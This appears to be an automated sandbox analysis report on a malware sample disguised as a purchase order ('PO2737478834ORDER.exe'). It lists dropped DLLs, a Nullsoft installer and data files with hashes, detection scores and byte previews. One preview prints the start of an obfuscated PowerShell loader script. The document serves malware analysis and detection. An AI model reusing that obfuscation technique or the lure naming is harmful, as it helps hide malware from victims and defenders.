                                                      SSDEEP:6144:u8YBC2NpfYjGg7t5xb7WOBOLFwh8yGHrIrvqqDL6XPbjm:ubG7F35BVh8yIZqn6vm
                                                      MD5:EF12AB9D0B231B8F898067B2114B1BC0
                                                      SHA1:6D90F27B2105945F9BB77039E8B892070A5F9442
                                                      SHA-256:2B00FC4F541AC10C94E3556FF28E30A801811C36422546A546A445ACA3F410F7
                                                      SHA-512:2AA62BFBA556AD8F042942DD25AA071FF6677C257904377C1EC956FD9E862ABCBF379E0CFD8C630C303A32ECE75618C24E3EEF58BDDB705C427985B944689193
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Joe Sandbox View:
                                                      • Filename: YQR4CA11sP.exe, Detection: malicious, Browse
                                                      • Filename: jYHfnNP0MN.exe, Detection: malicious, Browse
                                                      • Filename: HAN HII PAYMENT-USD.doc, Detection: malicious, Browse
                                                      • Filename: sample1.mp4.....................scr.exe, Detection: malicious, Browse
                                                      • Filename: l8p4UP25ft.exe, Detection: malicious, Browse
                                                      • Filename: PO7431.exe, Detection: malicious, Browse
                                                      • Filename: lcpXNQhTds.exe, Detection: malicious, Browse
                                                      • Filename: diaHXS238I.exe, Detection: malicious, Browse
                                                      • Filename: SAGcy7TqmW.exe, Detection: malicious, Browse
                                                      • Filename: frFUUDN8VV.exe, Detection: malicious, Browse
                                                      Reputation:moderate, very likely benign file
                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L...BW.[.........."!.........f......)........................................p......3R....@.........................p...P............@..x....................P......0...T...............................@...............8............................text...t........................... ..`.rdata..............................@..@.data...,H..........................@....rsrc...x....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................
                                                      Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):137168
                                                      Entropy (8bit):6.782906762178928
                                                      Encrypted:false
                                                      SSDEEP:3072:4kdWyaKm15vd/q/Py9UbfkVgxp1qt/t3PvT4UD2JJJvPBrSezRy:Fdtm15vtSfkVgxp12/t3PLxD2JJJvPQZ
                                                      MD5:75F8CC548CABF0CC800C25047E4D3124
                                                      SHA1:602676768F9FAECD35B48C38A0632781DFBDE10C
                                                      SHA-256:FB419A60305F17359E2AC0510233EE80E845885EEE60607715C67DD88E501EF0
                                                      SHA-512:ED831C9C769AEF3BE253C52542CF032AFA0A8FA5FE25CA704DB65EE6883C608220DF7102AC2B99EE9C2E599A0F5DB99FD86894A4B169E68440EB1B0D0012672F
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Joe Sandbox View:
                                                      • Filename: YQR4CA11sP.exe, Detection: malicious, Browse
                                                      • Filename: jYHfnNP0MN.exe, Detection: malicious, Browse
                                                      • Filename: HAN HII PAYMENT-USD.doc, Detection: malicious, Browse
                                                      • Filename: sample1.mp4.....................scr.exe, Detection: malicious, Browse
                                                      • Filename: l8p4UP25ft.exe, Detection: malicious, Browse
                                                      • Filename: PO7431.exe, Detection: malicious, Browse
                                                      • Filename: lcpXNQhTds.exe, Detection: malicious, Browse
                                                      • Filename: diaHXS238I.exe, Detection: malicious, Browse
                                                      • Filename: SAGcy7TqmW.exe, Detection: malicious, Browse
                                                      • Filename: frFUUDN8VV.exe, Detection: malicious, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..;..;..;.....;.W....;...8..;...?..;...:..;...>..;...:...;..:.w.;...?..;...>..;...;..;......;...9..;.Rich.;.........................PE..L....T.[.........."!.....z...................................................@............@A........................ ...t.......,.... ..x....................0..h......T...................4.......H...@...................L........................text....x.......z.................. ..`.rdata..>e.......f...~..............@..@.data...............................@....didat..8...........................@....rsrc...x.... ......................@..@.reloc..h....0......................@..B........................................................................................................................................................................................................................................
                                                      Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):440120
                                                      Entropy (8bit):6.652844702578311
                                                      Encrypted:false
                                                      SSDEEP:12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
                                                      MD5:109F0F02FD37C84BFC7508D4227D7ED5
                                                      SHA1:EF7420141BB15AC334D3964082361A460BFDB975
                                                      SHA-256:334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
                                                      SHA-512:46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................
                                                      Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:modified
                                                      Size (bytes):1246160
                                                      Entropy (8bit):6.76559888004065
                                                      Encrypted:false
                                                      SSDEEP:24576:Ab5zzlswYNYLVJAwfpeYQ1Dw/fEE8DhSJVIVfRyAkgO6S/V/jbHpls4MSRpMxkxo:+zW5ygDwnEZIYkjgWjblMSRpMqm
                                                      MD5:D7858E8449004E21B01D468E9FD04B82
                                                      SHA1:9524352071EDE21C167E7E4F106E9526DC23EF4E
                                                      SHA-256:78758BF7F3B3B5E3477E38354ACD32D787BC1286C8BD9B873471B9C195E638DB
                                                      SHA-512:1E2C981E6C0CA36C60C6E9CAE9548B866D5C524DF837095B30D618D9C322DEF7134C20DE820105400DD1B58076B66D90274F67773AC6BA914F611B419BABB440
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.4.g.Z.g.Z.g.Z.n...s.Z..[.e.Z..B..c.Z..Y.j.Z.._.m.Z..^.l.Z.E.[.o.Z..[.d.Z.g.[..Z..^.m.Z..Z.f.Z....f.Z..X.f.Z.Richg.Z.................PE..L...#W.[.........."!................w........................................@...........@..................................=..T.......p........................}..p...T..............................@............................................text............................... ..`.rdata...R.......T..................@..@.data...tG...`..."...B..............@....rsrc...p............d..............@..@.reloc...}.......~...h..............@..B........................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\PO2737478834ORDER.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):6656
                                                      Entropy (8bit):5.179628160538458
                                                      Encrypted:false
                                                      SSDEEP:96:5OBtEB2flLkatAthPZJoi9jpfW/er6cBbcB/NFyVOHd0+u3wEX:5hB2flXAVJtjf6cBbcB/N8Ved0PJ
                                                      MD5:AC0F93B2DEC82E9579BFF14C8572A6C8
                                                      SHA1:6460244317CBB77E342ADB3561EC3ACB496C84D5
                                                      SHA-256:3AA8E0ABADEFEA2DE58281198ACFE48713A1D5B43AEA5619F563CEA098E9FD34
                                                      SHA-512:8055A6AF150C45547927499F9CBF645D7F39C8E4F9CAFF4726FD711D2401ABCA01A79837095E5752B9F57B06446973EA6506796F2223BDB0179243D6E0575BD2
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........PE..L.....`...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):144848
                                                      Entropy (8bit):6.539673483315818
                                                      Encrypted:false
                                                      SSDEEP:3072:0Af6suip+d7FEk/oJz69sFaXeu9CoT2nIVFetBWPqeFYMMa:J6PbsF4CoT2OeN43Ma
                                                      MD5:471C983513694AC3002590345F2BE0DA
                                                      SHA1:6612B9AF4FF6830FA9B7D4193078434EF72F775B
                                                      SHA-256:BB3FF746471116C6AD0339FA0522AA2A44A787E33A29C7B27649A054ECD4D00F
                                                      SHA-512:A9B0FB923BC3B567E933DE10B141A3E9213640E3D790B4C4D753CF220D55593AE8026102909969BA6BFC22DA3B2FCD01E30A9F5A74BD14A0FDEC9BEAF0FB1410
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L...+W.[.........."!.........b...............................................P............@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):83784
                                                      Entropy (8bit):6.890347360270656
                                                      Encrypted:false
                                                      SSDEEP:1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
                                                      MD5:7587BF9CB4147022CD5681B015183046
                                                      SHA1:F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
                                                      SHA-256:C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
                                                      SHA-512:0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                      Category:dropped
                                                      Size (bytes):467152
                                                      Entropy (8bit):7.388463159439505
                                                      Encrypted:false
                                                      SSDEEP:6144:9qjI9UE2ypwdlL93DrhArk3l2fd55p5uhI5o8NUN6SYUiIdCcFSaKImLxUIohqy:UM2yKjL1mrnJpu0c6SDUH9UIohqy
                                                      MD5:6D84FE81C98C02205CC129F68ACA4529
                                                      SHA1:CF805BFA98D12C72A2F355CF1743DE9CA7B8D12C
                                                      SHA-256:987DA2FEBA47F44C619720682EB25199EB13AA4DDDD5759C37FA943C569D30BE
                                                      SHA-512:CAE0BB8A0297D54F5F9DB2C7361F5FBA9E8032E2BAD91573FF9D83AF3D87C86A483AFF4AFB0621CFC9DD744612BCDADF3AE315ED031C77ADC342D0B447310009
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 13%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG.sw..PG..VA..PG.Rich.PG.........PE..L...g..`.................b...........3............@.......................................@.................................8........P..@...............(............................................................................................text....`.......b.................. ..`.rdata..t............f..............@..@.data...8............z..............@....ndata.......P...........................rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:false
                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                      Process:C:\Users\user\Desktop\PO2737478834ORDER.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):2409
                                                      Entropy (8bit):4.921828274097712
                                                      Encrypted:false
                                                      SSDEEP:48:6tFHLn8LKvGp7Oqec9WjPHTxxr/G7m0FqDClP6VHKkvD/FIAbz:6thL8Xh8CWjPHNQKDClPGHKkv5Z
                                                      MD5:F7924202C5A0FA1A687C6D91F782025E
                                                      SHA1:ADAC8CE77E901725B99F2364B3F5F9BCB4E478B8
                                                      SHA-256:3FC4E9D3AF1F5E06CAAD21F079618E66E618EE4C2ABBC41AE1D870F63CF22D3F
                                                      SHA-512:9E9FEB6AA4019828D5FED31153259349FBF0C3AFDD498BCF6633AE63500865FF8FBADD5526EC88AFA99A76555F376BB0E8A060726B46DFAE2165DA03BBCC2F5E
                                                      Malicious:false
                                                      Preview:.....Z...P.......d......2.........g...R..$..a..z6i.C.......h.....,5d.......G.4....h....0.l............_..........S........i....D........[..$....I...`.k7..gH.....8.]..............m.>..........z...P..1........A............. %....>.....&.....z...E........."....a.1..................c.......d.......r..U.).. ....g...5....H...-......M...m......3..........,..x...b...........?.;(..I..T.....x.U......@.E...........C..................v...............,.......y.....P......'.bY..j.........w.2_!eF....%..q........P<..b...=B.Z...........^_........a&..4.........t..1......S=..V^.WP.;.>..fW=.....q.....r.Q.......w......*......uez.+...................G.....`'..Io..vJ....~.......a...n......q........*....9;..........e..m..t.).......................".y............=.+.........8.....K...e....T.....i...........Z.6..i3......}...8....u@.E7......G`.$zB..........G...........H......|..-...T..k...4.....`...%.......w.|......................... .....c.......^b.3......6..b......9...i... ..9......4^......S...|....
                                                      Process:C:\Users\user\Desktop\PO2737478834ORDER.exe
                                                      File Type:ASCII text, with very long lines (54181), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):54181
                                                      Entropy (8bit):5.365399789626996
                                                      Encrypted:false
                                                      SSDEEP:768:NvYlmgNRcueV2JcEgOu4Ijwezys01ZQ4hLzOP329Y0ZuZ1uLDtTYNVFMa3:NvYlLRcuW7EO4IjweoHbi32t8VaE
                                                      MD5:AB2BD584C3D4E1F6B687200045F39300
                                                      SHA1:7F9B567DB12D512961C686396ED2850064D72030
                                                      SHA-256:B0BD6EB0CE913E5E351D974AFEC11340E29711FD70287B629D16685D71BEEB13
                                                      SHA-512:F49F8FDC4ABD9D05734085DE9E5114247EE80EC088EA3D38DD4FEB9AD2989F9E9C863F887C7F6E80A66A29F87BAEC6D60543B06142558353BD2A717CF2DEDA42
                                                      Malicious:true
                                                      Preview:$Tobacco=$Unconsolability;<#Tomfooleries Supervigorousness Bovnet Hamotzi Tongueplay opstves #><#adelea Sammenholder Bracingly Trypsinises Grotternes Dorith #><#Afhent Apsissernes legering Amnesties Mllen rasurers #><#Darwinians Decorous Fadse #><#Folketingsvalgkamp Vouches Baandene #><#Loen Beskyttelsesvrdigstes Hovedmenuer #>$Gennemkomponere = "S,raf;DividF Wienu Talen ksec DemotPreexiOst.soHabitnKrops SpaltB For,a Di,laKamren EighdLn stsOpspap Vae.iNonmul Tranl Klebemuns rJuride.ronkn Bom,sS kke Quere(T.kno`$,hiocL G.unaS,llnaFjer nProtoeaartilTarryoUnd ufEpiphtIndussSter,eMor lgForelrMaskiiLivrenOrga g prede.rgyln MultsTidst, St,p Ultra`$ G avERetfanStil yVrvleaPilea1Tunun0Tayas4Consp D,akt= Lora eska.0Lage ) ,tud{ Va,s.Ba se`$GlobuML,thaoInterrMoraktAntieaCrim.rF.rbrb TidsoBu goaKaukar endedReedi=Infor-Hanso1 Gale8Cunni8 ibru2 L.ek3Bygge+Bor r1Dunka8Presu8 Proc2Klima5La,or;Susqu Smed tumml Isole Sik `$ SpecVDolefaAntenr CiseeOursegNailar No,pu SneupUnde pSeamaeSanitnimita Verbe
                                                      Process:C:\Users\user\Desktop\PO2737478834ORDER.exe
                                                      File Type:hp200 (68010) BSD
                                                      Category:dropped
                                                      Size (bytes):304184
                                                      Entropy (8bit):7.742579109665481
                                                      Encrypted:false
                                                      SSDEEP:6144:mcJqcrAp1tZxmXSbBZgvpUuGZuprhzL/B7Tah2VTAFm/:mPYqHZx5ZgvbGZuptaQAq
                                                      MD5:FA4692BF74CE5C895727F5DA3CFEEFEB
                                                      SHA1:D65E25B5DFEE6045B6EDAC2ECC7FE2410676A466
                                                      SHA-256:B2FA1D851A6B71F42F6B0D0FF1BF4D0295C96E3D53F099CDD8FDEDC955C92085
                                                      SHA-512:E11717952F82815AA147C0B0E61D892AB1F8CC859B8FFDEA9D8EE3B971874C29B85ADFE4A04BACF93C3C2EB66E9FC82035D38681B31DA3E9DD9F063651D02985
                                                      Malicious:false
                                                      Preview:............D.....\\..........)...///.......3..........'..../.................*..11........c.....666.CCCCCCC...''....................................>....;;....mm..............................gg...ss.... .......YY.d..............RR.<<<.......bb.........++.........$$.)....rrr.N...5..****....3.MMM......................//.8........@.......]]]]]..(........................{{....S......................G.......w..yy....!..oooooo...............44.ppp..........@@...........]]].......E.ss.....TT..{.............SS..9.........@.ll.I..v.`.....................0........b.n.........A............................ii............AA..........U......i.^^.P........................................y...............i.................**.........YY..............~........../....vvv..o....###.....U.............ll.........................kk...............................................XXXXX...............qq........4.............."".. ..#.........C.......................ee...........................................C..
                                                      Process:C:\Users\user\Desktop\PO2737478834ORDER.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):2615
                                                      Entropy (8bit):4.974917987525175
                                                      Encrypted:false
                                                      SSDEEP:48:Tx7WLj46/TNINxleJF20c0WvHs+eoI6QcfdqCTXHVZRHfnr88x0jFKFxpOj6:TxOuzu78M56NfdqW5vg5KFx3
                                                      MD5:31808B2401FEC80426CD7C4F008BAF52
                                                      SHA1:1C393E166232CE2AAC412E9DB70D155DB4B0326C
                                                      SHA-256:B9E821ED9285E6935A0EBC5A9F654CB68E63EE4FEEC0FD03780827E69F63B767
                                                      SHA-512:3D6B998B749A4739E7925F691B8783079470B99A1CE48DCF03F4F9AF90C72FA2BDAF145D7D25A89E717AD46B13DAF1E0B024AB93204E6E6F68F5E8D110AB81CD
                                                      Malicious:false
                                                      Preview:........\..........^..?.......&.....f........X............l....B...|..N.S...;...3........Yk...*.~..Z..................*.^:8......vI.....Z.........C.<w.;-......l.B...D..........w......[H...z<.........E..................k...................A"!.[.......U...;(...3t.........V.g..]..r........n..d..R........'.......j....GU.....6...7.s[......Hy.......9.......K.S.."..7...................^.0..6....= ....W.6..L.t....chz....................................+.-........o.?..............:..E...D.........................3..4.F.d.......z.......s............................<...................."....,.....r...M....Y1.$....4.......W..Lq.2/..B..........A.R..j-'..... .%.....V.....%75S.I................T......................`..#.7....P/.!.v.....u...B.K....B.....y.#.......3...n....=.|......t.......|..J.U.g....#.........3M..........p...U......................8j.R...."..W..\...0....A.w..&..z......"....,.......T......................Z.p(e......U....h.........p..aW...........!M........O.....Vp.
                                                      Process:C:\Users\user\Desktop\PO2737478834ORDER.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):3970
                                                      Entropy (8bit):5.0030075428346725
                                                      Encrypted:false
                                                      SSDEEP:96:cSLyunrdFXmCS+HgXuFiJeAQf1Wp/4syNGRAg6Uz:cuNBOQihg8esy4AvG
                                                      MD5:94DE1EDBEAEAA1438151EC77610E6ECE
                                                      SHA1:E3AB71B6FE6567861FD5856616A0E59DE273ADEC
                                                      SHA-256:299F3194C8FE68C935E7AFFB367C88434B5B4AE0C0F2EB9DCDEBD4F65DBAB954
                                                      SHA-512:C9FB5DCB71595B8A2ECF68AE614E1339FBEB3525EDCA43F52666A4766F9BC8F84545A5635D5C608D4638C1BBAFAFC1B0AF23C662E3F0536E33C719DF75AB4BC2
                                                      Malicious:false
                                                      Preview:.U..*..............V......I.......K...<.......Y.........*...J.n..H...........V....................@.w ..........X.U.............*G...e..y...Q...6H.........-i..:...J*N....G......R...$...O.....U..........?......../{M.....`.......`.....+.....................t...<........4L......b.....8...............................................s..F..........X.n..q.*S.....hp..8.... .......1NG..H....Ja..............jI.e..&......1.........B..xG.....g?h....[...............k.".........Z...e...Gt.6....t...)'..._.}e.S.......+......h............w..........L......._=u..........2.......>.......'..B...>....7.8........:......!........J.^...P.....J;..6..........D.q.......TFs.x...GK.......0..&.....0.....N...l......+..Q..(.................O.C..n...[.......h..(....Xu.v.........:...!..S...I...t.......M....H....^................>.......;.$F......6.......Q......$C........a.....+..w..C..L..`.f....v....aQN....}........R.....Rp........;.............f.......Ln......H.....6N........F.K{....a).G..............W
                                                      Process:C:\Users\user\Desktop\PO2737478834ORDER.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):2802
                                                      Entropy (8bit):4.8525624686595705
                                                      Encrypted:false
                                                      SSDEEP:48:P4g/vbbr5Xne/I5VXrGKLtCGZ5DQvIx70bqmmPVhwXu+5bDbjEvHAIih:Qg/vbX15xPtCGnDfp0bbmvwXu+5nbov+
                                                      MD5:C68E89EB338EAF7B72764E85711A48A1
                                                      SHA1:9E4D8687AFE5DD76684D71A7D284A6468D8E49FC
                                                      SHA-256:A9F053FFB6E58EAFBDC9466149B64A3B33551FFC7D053B476C8B05CBA0B49612
                                                      SHA-512:B350A7B601A04B96E4776E43599FE8905DDB97432B23A567A8E963003E244F2A724DA985C6A9C307C4EE196139BA3B8CF76723299355CFBDC3FA1F9FE55707F4
                                                      Malicious:false
                                                      Preview:l..4...Z............"q...........g5.........R5.....'.....L.....Q...4.O....G.....f...M...Q....".............=.-..'..R.......~Q..X.&o.....?{u.*........b..>.......L]........x=.............=&.................K...&........r.........U...>......U3......M................n._.P..`............w...V>..<..3...<.......%......)......!Y.......4...`=.....2..........+........6........`.'..[.A...............~.P....}.........K..........."..E.[.......$........[..........+oe|...9...~.3.]...3.[...........,N. .......!..J..I.........3......r..p....4...*...NG................EC..{...............n.....@...K...2..W...8..............u..P............R..........V.jt........Z..\T..my.........p. .....O..@..uQ.......p............"...P.F...D.................e.#.........W.Y"............N....$..!.....x......h..........5..u.............'p..z.....t.3..........Q......?t..x....................7........F4..$.....X..........a.L.H...l.h.........F....[I*.....V.p.AB......=r..Mk...+......K..Q.......c..'...qg.m....O{...
                                                      Process:C:\Users\user\Desktop\PO2737478834ORDER.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):1868
                                                      Entropy (8bit):4.756235999534301
                                                      Encrypted:false
                                                      SSDEEP:48:oDZAjIG83vUfh80cTs5wS6qGb7JBgyKOfXU4CgvfYlsGAgC+G:0ZAV0vUm0ln6tJBMOfXU4LvBB+G
                                                      MD5:3E5B971C620B18AE1098D4819205C1E7
                                                      SHA1:6FD5F664857B7CB2447CF68067CFD28D0F72DA0A
                                                      SHA-256:A1CE1AA31C6818C38B3F31AEA6357B5DA525467163C71DBCB4EBB68FF803F4D5
                                                      SHA-512:2EF1EF15AD1527CE81C549F52C6CDE364317E18A999168F4FB162AE371686531B3CEFC549BC0DAA70C8FD79041E231C9C9A2823108937C245B8214E5950BC164
                                                      Malicious:false
                                                      Preview:..c.......J........2..[.......:....6...%.............5'......|............t.....1.............]......l1.........`.#..C.........yM.._.Q.YT....1......x.........w...........L..|..........3.L..5..9.+...7......E*....c6.e...<....+..3..30.....]..M..p.....n...}.....|.....W.......z....K.......:...E................t.x......[.........$..}....Bx...@.............l.*............^e@....m.v....G....S............tD.....,.!...5.r...*.1.l..............3q....................F.R..?.......X.N=.........w...)&$....cYn................t.R!.....Yv.O................y.....A..4.............G.+........B.....'V.....|.....b....S....(.........w._........B....1...............-.........+..p...............Z........C............".........s}....uA...p.........Hm..2........T.G..KrX...........DAw....M...\.........6............|L|....R.a...\.....E........]..&..GB....g..Z...........C....-%......v...!...Y.....I...n..........................v.}.................[........................7............".E...Z.2...E.......
                                                      Process:C:\Users\user\Desktop\PO2737478834ORDER.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):3820
                                                      Entropy (8bit):4.907153655854474
                                                      Encrypted:false
                                                      SSDEEP:96:06Pghwx1ALQ6hVKYINmm8A6pw/F2TxFYloa/7vAlqdrE:06P5mQ64NmaawFyFUPvAwdrE
                                                      MD5:FC416CA4192E87DEFE39336DEB9ECBC4
                                                      SHA1:79D1F2FCE37A9DDBC569F9FC878ACBCF01C1F17C
                                                      SHA-256:283A4B8A0F9949B5E919250C23DDCD2923D6210001957BDC4BB651F789ABD820
                                                      SHA-512:2147F9A72F1BF8ED0C070765C21CFF5E69F9E6804AB74D7A305145621DE4E759BA2924A7CE50A50A23F009945FC51C4665D3DC617D8B91DC2D6FC05E235B59D6
                                                      Malicious:false
                                                      Preview:e0...G.V......s.h.............{.............[......C...;.....=. I..$`.........................v..%.M.....O......R............'u..a........Z-...y.......#....aR.................RZ....A.y..q.....,..........7T...$......\..bA.....F...t.........".....p.........Y..o..i................%........... t..m.......t&.......................(.....wG...|=..."=Q.........aV.Yi...;...M....@..................84.h...j....Kbt........]..m........1. ..............*....c.&.#...4.1...................*K.....................m.......f..Y8......p,.......AK.W.........s.....s...I..<N..L..Y.B......Q+.....p........7................W.......[........*...~...{............Y...l.....X..................-.............%.'.z.+...N.....w.......UYl]....$............5.....>.v...`<......G.....w..6......1........?..x..:..x...........q9...1.......o..........,...G..............*....]K.....t.......g..|.B.........5.l.............Q-.......E...|..x.<..A.................#.!..!..........F..........V........'...%....o...:...
                                                      Process:C:\Users\user\Desktop\PO2737478834ORDER.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):4696
                                                      Entropy (8bit):4.927405021767333
                                                      Encrypted:false
                                                      SSDEEP:96:e54mrLqiyZHxkL+LzZjZBNLeZatHw/rnfReUZYkGoe1dC/:eyQOD9xkaLzZjDEwwTnfIgleC/
                                                      MD5:3A347620722D6C4768D9E1238F0EB03E
                                                      SHA1:22B2AA3B0ADBA10EDDE0EF0FB74651B96CDA00AB
                                                      SHA-256:E732364966119D72903F7AB52922E60B57BC5BBE3D23E30A456448A17BC03396
                                                      SHA-512:965FC9FDA3C59D00C493A6EAF6275D3A9D0F526AEB3870954872BD5FCCD460BBBF8915D888FA942BF93A87B81EF17926108C92D03176565E3B408649F1435ECE
                                                      Malicious:false
                                                      Preview:+..........u......7..3................q+..........=..f....U.n,.....4..X...................J.F....1........""D,....L.........".............Ee....'.:.........@S..(....Q.........../.........}..P..~....C.F..6.........U......D.....Q.V......D.'.......h`.............E+i.........<...B.........&......b...................l.....j....J.T..........Ap.6.............s.....b...........................T......u.f......................J.....&v...........A....o...$......Z.......c....7.......f.................B.<......6....2._.........o.....f...v..j.....c.....L............m...a^.........U.................\.7.C...............H.,....XV......{............!.........R.#.Q...t.........<J.........r.E0.....................q..i....x..............k...\Y+.......a..k.I.1...i).........2..;:..bd.._.sf.........G..>.........i.......n.v.,...................s8D...v.............C..g......#{..T......P...N.....p..........(......^....u>............S^.b..t. ...... .....l..=.........,.......A.......f[....u#.g....
                                                      Process:C:\Users\user\Desktop\PO2737478834ORDER.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):1115
                                                      Entropy (8bit):4.634738688070356
                                                      Encrypted:false
                                                      SSDEEP:24:nx8ilM4ASDfv6vaxTPpUmJ6EQNgGp3llFytq+9g4pzt:n9vZ6APpU9de43llkT9hpB
                                                      MD5:17BA9F44A266B6CBBFCC23775BA426A1
                                                      SHA1:A5EDC01C7167A0BCE759C02151185EA8281F20CC
                                                      SHA-256:D194E9224325C0C6AA46BF811F78283E4F9FC60407689674C7225E6C61A8711E
                                                      SHA-512:E2E1B74D4D34C7D679C6857371243BEAC8F5C02D57222B5325164F8316ACB78B60F8A3E1FB4EA74152D2BC9FA1842DF8CC93A94B6029AD5145E02504D527DCAE
                                                      Malicious:false
